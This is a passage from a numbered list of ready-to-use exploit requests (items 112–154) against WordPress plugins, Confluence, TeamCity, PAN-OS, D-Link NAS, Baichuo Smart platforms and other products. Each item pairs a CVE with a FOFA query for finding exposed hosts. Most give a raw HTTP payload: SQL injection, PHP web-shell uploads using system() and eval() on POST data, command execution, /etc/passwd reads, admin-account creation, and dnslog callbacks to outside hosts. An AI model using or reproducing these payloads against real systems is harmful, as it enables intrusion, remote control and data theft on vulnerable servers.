User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--

117. WordPress LayerSlider plugin SQL injection
version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo (百绰) Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo (百绰) Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo (百绰) Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--

File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage:
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user is created, log in to the backend directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat CORS SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communications command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communications command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communications command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communications command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communications command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter is used to pass the command to be executed.
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass / template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.1514.1.3 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. Tianweier fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
